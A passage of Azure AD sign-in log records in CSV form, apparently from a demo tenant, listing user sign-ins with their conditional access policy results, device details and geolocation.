MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:46,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",f680c335-bc78-44a8-8570-4543e8aa0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f680c335-bc78-44a8-8570-4543e8aa0600,SigninLogs,Sucess,34.06555176,-118.2405396
+1430,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:32.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ca1de4aa-1783-40c1-890d-66bc31da0700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ca1de4aa-1783-40c1-890d-66bc31da0700,SigninLogs,Sucess,50.6406517,5.572050095
+1431,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:32.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ca1de4aa-1783-40c1-890d-66bc31da0700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ca1de4aa-1783-40c1-890d-66bc31da0700,SigninLogs,Sucess,50.6406517,5.572050095
+1432,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:34.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,44d172a6-94ea-4a71-a630-db14cfb9573f,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",41cc5746-ae7e-445a-962a-17f62d7e0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,41cc5746-ae7e-445a-962a-17f62d7e0700,SigninLogs,Sucess,34.06555176,-118.2405396
+1433,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:41.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c8882928-55f1-4f63-837c-438ca28267a9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",41cc5746-ae7e-445a-962a-17f6b17e0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,41cc5746-ae7e-445a-962a-17f6b17e0700,SigninLogs,Sucess,34.06555176,-118.2405396
+1434,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:10.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8a8d8a14-3461-495b-bd85-0410c2c523ea,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:34,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",8d371308-4e1f-476f-97d6-c0eab6dd0700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,8d371308-4e1f-476f-97d6-c0eab6dd0700,SigninLogs,Sucess,50.6406517,5.572050095
+1435,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:56.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b45d8152-6f81-45f8-a83b-753338fc19df,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 09:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3f80e775-4028-4bc5-9e8b-649bde4f0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3f80e775-4028-4bc5-9e8b-649bde4f0700,SigninLogs,Sucess,36.6404686,-78.26995087
+1436,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:22.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b5d3ab00-7872-4273-8734-98f417888a17,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",206c879d-2196-4a7a-8124-0022dab40600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,206c879d-2196-4a7a-8124-0022dab40600,SigninLogs,Sucess,50.6406517,5.572050095
+1437,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:29.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 